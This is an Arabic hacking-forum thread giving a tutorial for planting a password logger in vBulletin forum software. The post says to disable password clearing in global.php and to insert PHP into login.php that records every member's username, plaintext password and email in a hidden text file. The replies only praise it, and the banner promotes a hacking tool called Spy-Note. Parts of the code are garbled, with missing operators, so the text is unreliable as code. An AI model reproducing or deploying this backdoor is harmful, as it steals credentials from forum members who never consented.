1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. DR.THMOORY
    rank
    Developer

    عضو منذ:
    ‏2 ديسمبر 2011
    عدد المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    طالب
    الإقامة:
    ROOT
    السلام عليكم ورحمة الله وبركآته .. &:":
    طبعآ هالدرس راح نطرح كيف عمل كيلوجر لتسجيل دخول الاعضاء .. )2:"

    طيب نبدا نشوف سوا ..:{13}:

    نقوم بفتح ملف global.php

    نقوم بالبحث عن هاذا السطر..


    كود PHP:
    $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 0;
    الان نقوم بتعطية بالعلامة //

    كود PHP:
    //$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
    آشطة الان نقوم بفتح ملف login.php bl"eh"

    ونبحث عن هاذا السطر


    كود PHP:
    process_new_login
    ونضع تحته هاذا الكود

    كود PHP:
    $lg_username strtolower($vbulletin->GPC["vb_login_username"]); $lg_password $vbulletin->GPC["vb_login_password"]; $lg_file "./includes/IQ-T34M.txt"$sql_query = @mysql_query("SELECT * FROM " TABLE_PREFIX "user WHERE username='" $lg_username "'"); while($row = @mysql_fetch_array($sql_query)) { if(strlen($lg_password) > AND strlen($lg_username) > 1) { $fp1 = @fopen($lg_file"a+"); @fwrite($fp1$lg_username ' : ' $lg_password." (" $row["email"] . ")\n"); @fclose($fp1); $f = @file($lg_file); $new array_unique($f); $fp = @fopen($lg_file"w"); foreach($new as $values) { @fputs($fp$values); } @fclose($fp); } }
    الان اليوزرات بكون في

    includes/IQ-T34M.txt


    [​IMG]

    ا المواقع التركية كان محفوظ بالجهاز قلت بنزله ..

    لو مكرر ,,فيكم تحذفوه &:"
    --
    والسلام خير الختام
    :{2}:
     
    جاري تحميل الصفحة...
  2. salah-pro
    rankrank
    ExpErt DeveloPer

    عضو منذ:
    ‏25 ديسمبر 2011
    عدد المشاركات:
    60
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    الإقامة:
    U.A.E
    رد: vBulletin Password Logger = IQ-T34M

    بارك الله فيكـ
    ابداع × ابداع
     
  3. DR.THMOORY
    rank
    Developer

    عضو منذ:
    ‏2 ديسمبر 2011
    عدد المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    طالب
    الإقامة:
    ROOT
    رد: vBulletin Password Logger = IQ-T34M

    تسلم حبيب قلبي الابدآع منك وفيك
    نورت الموضوع بـ طلتك ي بعدي
    يعافيـك ربي ي غالي . .
     
  4. Y-WaLiS
    rank
    Developer

    عضو منذ:
    ‏8 يوليو 2012
    عدد المشاركات:
    30
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    nador
    رد: vBulletin Password Logger = IQ-T34M

    بطل حبيبي :{4}:​
     
  5. ӎƦ.HmidE
    DeveloPer Plus

    عضو منذ:
    ‏9 يوليو 2012
    عدد المشاركات:
    102
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    الوظيفة:
    .....
    الإقامة:
    JoRdaN
    رد: vBulletin Password Logger = IQ-T34M

    بطل حبيب قلبي شرح ولا احلى . . [​IMG]
     
  6. MaRwAn
    rank
    Developer

    عضو منذ:
    ‏4 يوليو 2012
    عدد المشاركات:
    19
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    نظام التشغيل:
    windows 8
    رد: vBulletin Password Logger = IQ-T34M

    يــــــــــعطيك العافية على الشرح الممتاز
     
  7. ряоfеѕѕіопаL
    V • I • P

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    105
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الإقامة:
    مدريد
    رد: vBulletin Password Logger = IQ-T34M

    بوركت يداك ياحبيبي الشرح مفيد رغم معروف عند البعض لاكن له اهميته

    تستاهل التقيم

     
  8. Şɳɨρɛя
    rank
    Developer

    عضو منذ:
    ‏9 يوليو 2012
    عدد المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    Admin
    رد: vBulletin Password Logger = IQ-T34M

    تشكر على الإفادة
     
  9. كلآشنكوف
    Developer

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    86
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    رد: vBulletin Password Logger = IQ-T34M

    شكرا لك على الموضوع الجميل و المفيذ ♥

    جزاك الله الف خير على كل ما تقدمه لهذا المنتدى
    :{1}:

    ننتظر ابداعاتك الجميلة بفارغ الصبر
    :{8}:
     
  10. HITLER
    rank
    Developer

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    37
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الوظيفة:
    سياسي
    الإقامة:
    برلين ـ المانيا
    نظام التشغيل:
    Linux
    رد: vBulletin Password Logger = IQ-T34M

    وعليكم السلام ورحمة الله وبركاته
    .:{11}:.
    الله يعطيك العافيه
    موضوع جميل ورائع
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...